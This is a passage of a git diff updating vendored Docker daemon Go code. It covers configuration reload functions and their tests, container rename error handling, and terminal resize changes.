+		daemon.discoveryWatcher = discoveryWatcher
+	} else if err == discovery.ErrDiscoveryDisabled {
+		// disable discovery if it was previously enabled and it's disabled now
+		daemon.discoveryWatcher.Stop()
+	} else if err = daemon.discoveryWatcher.Reload(conf.ClusterStore, newAdvertise, conf.ClusterOpts); err != nil {
+		// reload discovery
+		return err
+	}
+
+	daemon.configStore.ClusterStore = newClusterStore
+	daemon.configStore.ClusterOpts = conf.ClusterOpts
+	daemon.configStore.ClusterAdvertise = newAdvertise
+
+	if daemon.netController == nil {
+		return nil
+	}
+	netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil)
+	if err != nil {
+		logrus.WithError(err).Warnf("failed to get options with network controller")
+		return nil
+	}
+	err = daemon.netController.ReloadConfiguration(netOptions...)
+	if err != nil {
+		logrus.Warnf("Failed to reload configuration with network controller: %v", err)
+	}
+	return nil
+}
+
+// reloadLabels updates configuration with engine labels
+// and updates the passed attributes
+func (daemon *Daemon) reloadLabels(conf *config.Config, attributes map[string]string) error {
+	// update corresponding configuration
+	if conf.IsValueSet("labels") {
+		daemon.configStore.Labels = conf.Labels
+	}
+
+	// prepare reload event attributes with updatable configurations
+	if daemon.configStore.Labels != nil {
+		labels, err := json.Marshal(daemon.configStore.Labels)
+		if err != nil {
+			return err
+		}
+		attributes["labels"] = string(labels)
+	} else {
+		attributes["labels"] = "[]"
+	}
+
+	return nil
+}
+
+// reloadAllowNondistributableArtifacts updates the configuration with allow-nondistributable-artifacts options
+// and updates the passed attributes.
+func (daemon *Daemon) reloadAllowNondistributableArtifacts(conf *config.Config, attributes map[string]string) error {
+	// Update corresponding configuration.
+	if conf.IsValueSet("allow-nondistributable-artifacts") {
+		daemon.configStore.AllowNondistributableArtifacts = conf.AllowNondistributableArtifacts
+		if err := daemon.RegistryService.LoadAllowNondistributableArtifacts(conf.AllowNondistributableArtifacts); err != nil {
+			return err
+		}
+	}
+
+	// Prepare reload event attributes with updatable configurations.
+	if daemon.configStore.AllowNondistributableArtifacts != nil {
+		v, err := json.Marshal(daemon.configStore.AllowNondistributableArtifacts)
+		if err != nil {
+			return err
+		}
+		attributes["allow-nondistributable-artifacts"] = string(v)
+	} else {
+		attributes["allow-nondistributable-artifacts"] = "[]"
+	}
+
+	return nil
+}
+
+// reloadInsecureRegistries updates configuration with insecure registry option
+// and updates the passed attributes
+func (daemon *Daemon) reloadInsecureRegistries(conf *config.Config, attributes map[string]string) error {
+	// update corresponding configuration
+	if conf.IsValueSet("insecure-registries") {
+		daemon.configStore.InsecureRegistries = conf.InsecureRegistries
+		if err := daemon.RegistryService.LoadInsecureRegistries(conf.InsecureRegistries); err != nil {
+			return err
+		}
+	}
+
+	// prepare reload event attributes with updatable configurations
+	if daemon.configStore.InsecureRegistries != nil {
+		insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries)
+		if err != nil {
+			return err
+		}
+		attributes["insecure-registries"] = string(insecureRegistries)
+	} else {
+		attributes["insecure-registries"] = "[]"
+	}
+
+	return nil
+}
+
+// reloadRegistryMirrors updates configuration with registry mirror options
+// and updates the passed attributes
+func (daemon *Daemon) reloadRegistryMirrors(conf *config.Config, attributes map[string]string) error {
+	// update corresponding configuration
+	if conf.IsValueSet("registry-mirrors") {
+		daemon.configStore.Mirrors = conf.Mirrors
+		if err := daemon.RegistryService.LoadMirrors(conf.Mirrors); err != nil {
+			return err
+		}
+	}
+
+	// prepare reload event attributes with updatable configurations
+	if daemon.configStore.Mirrors != nil {
+		mirrors, err := json.Marshal(daemon.configStore.Mirrors)
+		if err != nil {
+			return err
+		}
+		attributes["registry-mirrors"] = string(mirrors)
+	} else {
+		attributes["registry-mirrors"] = "[]"
+	}
+
+	return nil
+}
+
+// reloadLiveRestore updates configuration with live retore option
+// and updates the passed attributes
+func (daemon *Daemon) reloadLiveRestore(conf *config.Config, attributes map[string]string) error {
+	// update corresponding configuration
+	if conf.IsValueSet("live-restore") {
+		daemon.configStore.LiveRestoreEnabled = conf.LiveRestoreEnabled
+	}
+
+	// prepare reload event attributes with updatable configurations
+	attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled)
+	return nil
+}
+
+// reloadNetworkDiagnosticPort updates the network controller starting the diagnostic if the config is valid
+func (daemon *Daemon) reloadNetworkDiagnosticPort(conf *config.Config, attributes map[string]string) error {
+	if conf == nil || daemon.netController == nil || !conf.IsValueSet("network-diagnostic-port") ||
+		conf.NetworkDiagnosticPort < 1 || conf.NetworkDiagnosticPort > 65535 {
+		// If there is no config make sure that the diagnostic is off
+		if daemon.netController != nil {
+			daemon.netController.StopDiagnostic()
+		}
+		return nil
+	}
+	// Enable the network diagnostic if the flag is set with a valid port withing the range
+	logrus.WithFields(logrus.Fields{"port": conf.NetworkDiagnosticPort, "ip": "127.0.0.1"}).Warn("Starting network diagnostic server")
+	daemon.netController.StartDiagnostic(conf.NetworkDiagnosticPort)
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/reload_test.go b/vendor/github.com/docker/docker/daemon/reload_test.go
new file mode 100644
index 0000000000..ffad297f71
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/reload_test.go
@@ -0,0 +1,573 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"os"
+	"reflect"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/images"
+	"github.com/docker/docker/pkg/discovery"
+	_ "github.com/docker/docker/pkg/discovery/memory"
+	"github.com/docker/docker/registry"
+	"github.com/docker/libnetwork"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDaemonReloadLabels(t *testing.T) {
+	daemon := &Daemon{
+		configStore: &config.Config{
+			CommonConfig: config.CommonConfig{
+				Labels: []string{"foo:bar"},
+			},
+		},
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["labels"] = "foo:baz"
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			Labels:    []string{"foo:baz"},
+			ValuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	label := daemon.configStore.Labels[0]
+	if label != "foo:baz" {
+		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
+	}
+}
+
+func TestDaemonReloadAllowNondistributableArtifacts(t *testing.T) {
+	daemon := &Daemon{
+		configStore:  &config.Config{},
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+
+	var err error
+	// Initialize daemon with some registries.
+	daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{
+		AllowNondistributableArtifacts: []string{
+			"127.0.0.0/8",
+			"10.10.1.11:5000",
+			"10.10.1.22:5000", // This will be removed during reload.
+			"docker1.com",
+			"docker2.com", // This will be removed during reload.
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	registries := []string{
+		"127.0.0.0/8",
+		"10.10.1.11:5000",
+		"10.10.1.33:5000", // This will be added during reload.
+		"docker1.com",
+		"docker3.com", // This will be added during reload.
+	}
+
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			ServiceOptions: registry.ServiceOptions{
+				AllowNondistributableArtifacts: registries,
+			},
+			ValuesSet: map[string]interface{}{
+				"allow-nondistributable-artifacts": registries,
+			},
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	var actual []string
+	serviceConfig := daemon.RegistryService.ServiceConfig()
+	for _, value := range serviceConfig.AllowNondistributableArtifactsCIDRs {
+		actual = append(actual, value.String())
+	}
+	actual = append(actual, serviceConfig.AllowNondistributableArtifactsHostnames...)
+
+	sort.Strings(registries)
+	sort.Strings(actual)
+	assert.Check(t, is.DeepEqual(registries, actual))
+}
+
+func TestDaemonReloadMirrors(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	var err error
+	daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{
+		InsecureRegistries: []string{},
+		Mirrors: []string{
+			"https://mirror.test1.com",
+			"https://mirror.test2.com", // this will be removed when reloading
+			"https://mirror.test3.com", // this will be removed when reloading
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	daemon.configStore = &config.Config{}
+
+	type pair struct {
+		valid   bool
+		mirrors []string
+		after   []string
+	}
+
+	loadMirrors := []pair{
+		{
+			valid:   false,
+			mirrors: []string{"10.10.1.11:5000"}, // this mirror is invalid
+			after:   []string{},
+		},
+		{
+			valid:   false,
+			mirrors: []string{"mirror.test1.com"}, // this mirror is invalid
+			after:   []string{},
+		},
+		{
+			valid:   false,
+			mirrors: []string{"10.10.1.11:5000", "mirror.test1.com"}, // mirrors are invalid
+			after:   []string{},
+		},
+		{
+			valid:   true,
+			mirrors: []string{"https://mirror.test1.com", "https://mirror.test4.com"},
+			after:   []string{"https://mirror.test1.com/", "https://mirror.test4.com/"},
+		},
+	}
+
+	for _, value := range loadMirrors {
+		valuesSets := make(map[string]interface{})
+		valuesSets["registry-mirrors"] = value.mirrors
+
+		newConfig := &config.Config{
+			CommonConfig: config.CommonConfig{
+				ServiceOptions: registry.ServiceOptions{
+					Mirrors: value.mirrors,
+				},
+				ValuesSet: valuesSets,
+			},
+		}
+
+		err := daemon.Reload(newConfig)
+		if !value.valid && err == nil {
+			// mirrors should be invalid, should be a non-nil error
+			t.Fatalf("Expected daemon reload error with invalid mirrors: %s, while get nil", value.mirrors)
+		}
+
+		if value.valid {
+			if err != nil {
+				// mirrors should be valid, should be no error
+				t.Fatal(err)
+			}
+			registryService := daemon.RegistryService.ServiceConfig()
+
+			if len(registryService.Mirrors) != len(value.after) {
+				t.Fatalf("Expected %d daemon mirrors %s while get %d with %s",
+					len(value.after),
+					value.after,
+					len(registryService.Mirrors),
+					registryService.Mirrors)
+			}
+
+			dataMap := map[string]struct{}{}
+
+			for _, mirror := range registryService.Mirrors {
+				if _, exist := dataMap[mirror]; !exist {
+					dataMap[mirror] = struct{}{}
+				}
+			}
+
+			for _, address := range value.after {
+				if _, exist := dataMap[address]; !exist {
+					t.Fatalf("Expected %s in daemon mirrors, while get none", address)
+				}
+			}
+		}
+	}
+}
+
+func TestDaemonReloadInsecureRegistries(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	var err error
+	// initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000"
+	daemon.RegistryService, err = registry.NewService(registry.ServiceOptions{
+		InsecureRegistries: []string{
+			"127.0.0.0/8",
+			"10.10.1.11:5000",
+			"10.10.1.22:5000", // this will be removed when reloading
+			"docker1.com",
+			"docker2.com", // this will be removed when reloading
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	daemon.configStore = &config.Config{}
+
+	insecureRegistries := []string{
+		"127.0.0.0/8",     // this will be kept
+		"10.10.1.11:5000", // this will be kept
+		"10.10.1.33:5000", // this will be newly added
+		"docker1.com",     // this will be kept
+		"docker3.com",     // this will be newly added
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["insecure-registries"] = insecureRegistries
+
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			ServiceOptions: registry.ServiceOptions{
+				InsecureRegistries: insecureRegistries,
+			},
+			ValuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	// After Reload, daemon.RegistryService will be changed which is useful
+	// for registry communication in daemon.
+	registries := daemon.RegistryService.ServiceConfig()
+
+	// After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon.
+	// Then collect registries.InsecureRegistryCIDRs in dataMap.
+	// When collecting, we need to convert CIDRS into string as a key,
+	// while the times of key appears as value.
+	dataMap := map[string]int{}
+	for _, value := range registries.InsecureRegistryCIDRs {
+		if _, ok := dataMap[value.String()]; !ok {
+			dataMap[value.String()] = 1
+		} else {
+			dataMap[value.String()]++
+		}
+	}
+
+	for _, value := range registries.IndexConfigs {
+		if _, ok := dataMap[value.Name]; !ok {
+			dataMap[value.Name] = 1
+		} else {
+			dataMap[value.Name]++
+		}
+	}
+
+	// Finally compare dataMap with the original insecureRegistries.
+	// Each value in insecureRegistries should appear in daemon's insecure registries,
+	// and each can only appear exactly ONCE.
+	for _, r := range insecureRegistries {
+		if value, ok := dataMap[r]; !ok {
+			t.Fatalf("Expected daemon insecure registry %s, got none", r)
+		} else if value != 1 {
+			t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value)
+		}
+	}
+
+	// assert if "10.10.1.22:5000" is removed when reloading
+	if value, ok := dataMap["10.10.1.22:5000"]; ok {
+		t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value)
+	}
+
+	// assert if "docker2.com" is removed when reloading
+	if value, ok := dataMap["docker2.com"]; ok {
+		t.Fatalf("Expected no insecure registry of docker2.com, got %d", value)
+	}
+}
+
+func TestDaemonReloadNotAffectOthers(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	daemon.configStore = &config.Config{
+		CommonConfig: config.CommonConfig{
+			Labels: []string{"foo:bar"},
+			Debug:  true,
+		},
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["labels"] = "foo:baz"
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			Labels:    []string{"foo:baz"},
+			ValuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	label := daemon.configStore.Labels[0]
+	if label != "foo:baz" {
+		t.Fatalf("Expected daemon label `foo:baz`, got %s", label)
+	}
+	debug := daemon.configStore.Debug
+	if !debug {
+		t.Fatal("Expected debug 'enabled', got 'disabled'")
+	}
+}
+
+func TestDaemonDiscoveryReload(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	daemon.configStore = &config.Config{
+		CommonConfig: config.CommonConfig{
+			ClusterStore:     "memory://127.0.0.1",
+			ClusterAdvertise: "127.0.0.1:3333",
+		},
+	}
+
+	if err := daemon.initDiscovery(daemon.configStore); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "3333"},
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["cluster-store"] = "memory://127.0.0.1:2222"
+	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			ClusterStore:     "memory://127.0.0.1:2222",
+			ClusterAdvertise: "127.0.0.1:5555",
+			ValuesSet:        valuesSets,
+		},
+	}
+
+	expected = discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	ch, errCh = daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+}
+
+func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	daemon.configStore = &config.Config{}
+
+	valuesSet := make(map[string]interface{})
+	valuesSet["cluster-store"] = "memory://127.0.0.1:2222"
+	valuesSet["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			ClusterStore:     "memory://127.0.0.1:2222",
+			ClusterAdvertise: "127.0.0.1:5555",
+			ValuesSet:        valuesSet,
+		},
+	}
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for discovery")
+	case <-daemon.discoveryWatcher.ReadyCh():
+	}
+
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+}
+
+func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) {
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	daemon.configStore = &config.Config{
+		CommonConfig: config.CommonConfig{
+			ClusterStore: "memory://127.0.0.1",
+		},
+	}
+	valuesSets := make(map[string]interface{})
+	valuesSets["cluster-advertise"] = "127.0.0.1:5555"
+	newConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			ClusterAdvertise: "127.0.0.1:5555",
+			ValuesSet:        valuesSets,
+		},
+	}
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "127.0.0.1", Port: "5555"},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-daemon.discoveryWatcher.ReadyCh():
+	case <-time.After(10 * time.Second):
+		t.Fatal("Timeout waiting for discovery")
+	}
+	stopCh := make(chan struct{})
+	defer close(stopCh)
+	ch, errCh := daemon.discoveryWatcher.Watch(stopCh)
+
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("failed to get discovery advertisements in time")
+	case e := <-ch:
+		if !reflect.DeepEqual(e, expected) {
+			t.Fatalf("expected %v, got %v\n", expected, e)
+		}
+	case e := <-errCh:
+		t.Fatal(e)
+	}
+}
+
+func TestDaemonReloadNetworkDiagnosticPort(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+	daemon := &Daemon{
+		imageService: images.NewImageService(images.ImageServiceConfig{}),
+	}
+	daemon.configStore = &config.Config{}
+
+	valuesSet := make(map[string]interface{})
+	valuesSet["network-diagnostic-port"] = 2000
+	enableConfig := &config.Config{
+		CommonConfig: config.CommonConfig{
+			NetworkDiagnosticPort: 2000,
+			ValuesSet:             valuesSet,
+		},
+	}
+	disableConfig := &config.Config{
+		CommonConfig: config.CommonConfig{},
+	}
+
+	netOptions, err := daemon.networkOptions(enableConfig, nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	controller, err := libnetwork.New(netOptions...)
+	if err != nil {
+		t.Fatal(err)
+	}
+	daemon.netController = controller
+
+	// Enable/Disable the server for some iterations
+	for i := 0; i < 10; i++ {
+		enableConfig.CommonConfig.NetworkDiagnosticPort++
+		if err := daemon.Reload(enableConfig); err != nil {
+			t.Fatal(err)
+		}
+		// Check that the diagnostic is enabled
+		if !daemon.netController.IsDiagnosticEnabled() {
+			t.Fatalf("diagnostic should be enable")
+		}
+
+		// Reload
+		if err := daemon.Reload(disableConfig); err != nil {
+			t.Fatal(err)
+		}
+		// Check that the diagnostic is disabled
+		if daemon.netController.IsDiagnosticEnabled() {
+			t.Fatalf("diagnostic should be disable")
+		}
+	}
+
+	enableConfig.CommonConfig.NetworkDiagnosticPort++
+	// 2 times the enable should not create problems
+	if err := daemon.Reload(enableConfig); err != nil {
+		t.Fatal(err)
+	}
+	// Check that the diagnostic is enabled
+	if !daemon.netController.IsDiagnosticEnabled() {
+		t.Fatalf("diagnostic should be enable")
+	}
+
+	// Check that another reload does not cause issues
+	if err := daemon.Reload(enableConfig); err != nil {
+		t.Fatal(err)
+	}
+	// Check that the diagnostic is enable
+	if !daemon.netController.IsDiagnosticEnabled() {
+		t.Fatalf("diagnostic should be enable")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/daemon/reload_unix.go b/vendor/github.com/docker/docker/daemon/reload_unix.go
new file mode 100644
index 0000000000..9c1bb992af
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/reload_unix.go
@@ -0,0 +1,56 @@
+// +build linux freebsd
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"bytes"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/daemon/config"
+)
+
+// reloadPlatform updates configuration with platform specific options
+// and updates the passed attributes
+func (daemon *Daemon) reloadPlatform(conf *config.Config, attributes map[string]string) error {
+	if err := conf.ValidatePlatformConfig(); err != nil {
+		return err
+	}
+
+	if conf.IsValueSet("runtimes") {
+		// Always set the default one
+		conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary}
+		if err := daemon.initRuntimes(conf.Runtimes); err != nil {
+			return err
+		}
+		daemon.configStore.Runtimes = conf.Runtimes
+	}
+
+	if conf.DefaultRuntime != "" {
+		daemon.configStore.DefaultRuntime = conf.DefaultRuntime
+	}
+
+	if conf.IsValueSet("default-shm-size") {
+		daemon.configStore.ShmSize = conf.ShmSize
+	}
+
+	if conf.IpcMode != "" {
+		daemon.configStore.IpcMode = conf.IpcMode
+	}
+
+	// Update attributes
+	var runtimeList bytes.Buffer
+	for name, rt := range daemon.configStore.Runtimes {
+		if runtimeList.Len() > 0 {
+			runtimeList.WriteRune(' ')
+		}
+		runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt))
+	}
+
+	attributes["runtimes"] = runtimeList.String()
+	attributes["default-runtime"] = daemon.configStore.DefaultRuntime
+	attributes["default-shm-size"] = fmt.Sprintf("%d", daemon.configStore.ShmSize)
+	attributes["default-ipc-mode"] = daemon.configStore.IpcMode
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/reload_windows.go b/vendor/github.com/docker/docker/daemon/reload_windows.go
new file mode 100644
index 0000000000..548466e8ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/reload_windows.go
@@ -0,0 +1,9 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import "github.com/docker/docker/daemon/config"
+
+// reloadPlatform updates configuration with platform specific options
+// and updates the passed attributes
+func (daemon *Daemon) reloadPlatform(config *config.Config, attributes map[string]string) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go
index ffb7715f23..2b2c48b292 100644
--- a/vendor/github.com/docker/docker/daemon/rename.go
+++ b/vendor/github.com/docker/docker/daemon/rename.go
@@ -1,12 +1,13 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	dockercontainer "github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/libnetwork"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerRename changes the name of a container, using the oldName
@@ -19,7 +20,7 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error {
 	)
 
 	if oldName == "" || newName == "" {
-		return fmt.Errorf("Neither old nor new names may be empty")
+		return errdefs.InvalidParameter(errors.New("Neither old nor new names may be empty"))
 	}
 
 	if newName[0] != '/' {
@@ -31,30 +32,30 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error {
 		return err
 	}
 
+	container.Lock()
+	defer container.Unlock()
+
 	oldName = container.Name
 	oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint
 
 	if oldName == newName {
-		return fmt.Errorf("Renaming a container with the same name as its current name")
+		return errdefs.InvalidParameter(errors.New("Renaming a container with the same name as its current name"))
 	}
 
-	container.Lock()
-	defer container.Unlock()
-
 	links := map[string]*dockercontainer.Container{}
 	for k, v := range daemon.linkIndex.children(container) {
 		if !strings.HasPrefix(k, oldName) {
-			return fmt.Errorf("Linked container %s does not match parent %s", k, oldName)
+			return errdefs.InvalidParameter(errors.Errorf("Linked container %s does not match parent %s", k, oldName))
 		}
 		links[strings.TrimPrefix(k, oldName)] = v
 	}
 
 	if newName, err = daemon.reserveName(container.ID, newName); err != nil {
-		return fmt.Errorf("Error when allocating new name: %v", err)
+		return errors.Wrap(err, "Error when allocating new name")
 	}
 
 	for k, v := range links {
-		daemon.nameIndex.Reserve(newName+k, v.ID)
+		daemon.containersReplica.ReserveName(newName+k, v.ID)
 		daemon.linkIndex.link(container, v, newName+k)
 	}
 
@@ -67,10 +68,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error {
 			container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint
 			daemon.reserveName(container.ID, oldName)
 			for k, v := range links {
-				daemon.nameIndex.Reserve(oldName+k, v.ID)
+				daemon.containersReplica.ReserveName(oldName+k, v.ID)
 				daemon.linkIndex.link(container, v, oldName+k)
 				daemon.linkIndex.unlink(newName+k, v, container)
-				daemon.nameIndex.Release(newName + k)
+				daemon.containersReplica.ReleaseName(newName + k)
 			}
 			daemon.releaseName(newName)
 		}
@@ -78,10 +79,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error {
 
 	for k, v := range links {
 		daemon.linkIndex.unlink(oldName+k, v, container)
-		daemon.nameIndex.Release(oldName + k)
+		daemon.containersReplica.ReleaseName(oldName + k)
 	}
 	daemon.releaseName(oldName)
-	if err = container.ToDisk(); err != nil {
+	if err = container.CheckpointTo(daemon.containersReplica); err != nil {
 		return err
 	}
 
@@ -98,14 +99,14 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error {
 		if err != nil {
 			container.Name = oldName
 			container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint
-			if e := container.ToDisk(); e != nil {
+			if e := container.CheckpointTo(daemon.containersReplica); e != nil {
 				logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e)
 			}
 		}
 	}()
 
 	sid = container.NetworkSettings.SandboxID
-	if daemon.netController != nil {
+	if sid != "" && daemon.netController != nil {
 		sb, err = daemon.netController.SandboxByID(sid)
 		if err != nil {
 			return err
diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go
index 747353852e..21240650f8 100644
--- a/vendor/github.com/docker/docker/daemon/resize.go
+++ b/vendor/github.com/docker/docker/daemon/resize.go
@@ -1,7 +1,9 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
+	"time"
 
 	"github.com/docker/docker/libcontainerd"
 )
@@ -15,10 +17,10 @@ func (daemon *Daemon) ContainerResize(name string, height, width int) error {
 	}
 
 	if !container.IsRunning() {
-		return errNotRunning{container.ID}
+		return errNotRunning(container.ID)
 	}
 
-	if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil {
+	if err = daemon.containerd.ResizeTerminal(context.Background(), container.ID, libcontainerd.InitProcessName, width, height); err == nil {
 		attributes := map[string]string{
 			"height": fmt.Sprintf("%d", height),
 			"width":  fmt.Sprintf("%d", width),
@@ -36,5 +38,13 @@ func (daemon *Daemon) ContainerExecResize(name string, height, width int) error
 	if err != nil {
 		return err
 	}
-	return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height)
+	// TODO: the timeout is hardcoded here, it would be more flexible to make it
+	// a parameter in resize request context, which would need API changes.
+	timeout := 10 * time.Second
+	select {
+	case <-ec.Started:
+		return daemon.containerd.ResizeTerminal(context.Background(), ec.ContainerID, ec.ID, width, height)
+	case <-time.After(timeout):
+		return fmt.Errorf("timeout waiting for exec session ready")
+	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/resize_test.go b/vendor/github.com/docker/docker/daemon/resize_test.go
new file mode 100644
index 0000000000..edfe9d3ed1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/resize_test.go
@@ -0,0 +1,103 @@
+// +build linux
+
+package daemon
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+	"gotest.tools/assert"
+)
+
+// This test simply verify that when a wrong ID used, a specific error should be returned for exec resize.
+func TestExecResizeNoSuchExec(t *testing.T) {
+	n := "TestExecResize"
+	d := &Daemon{
+		execCommands: exec.NewStore(),
+	}
+	c := &container.Container{
+		ExecCommands: exec.NewStore(),
+	}
+	ec := &exec.Config{
+		ID: n,
+	}
+	d.registerExecCommand(c, ec)
+	err := d.ContainerExecResize("nil", 24, 8)
+	assert.ErrorContains(t, err, "No such exec instance")
+}
+
+type execResizeMockContainerdClient struct {
+	MockContainerdClient
+	ProcessID   string
+	ContainerID string
+	Width       int
+	Height      int
+}
+
+func (c *execResizeMockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error {
+	c.ProcessID = processID
+	c.ContainerID = containerID
+	c.Width = width
+	c.Height = height
+	return nil
+}
+
+// This test is to make sure that when exec context is ready, resize should call ResizeTerminal via containerd client.
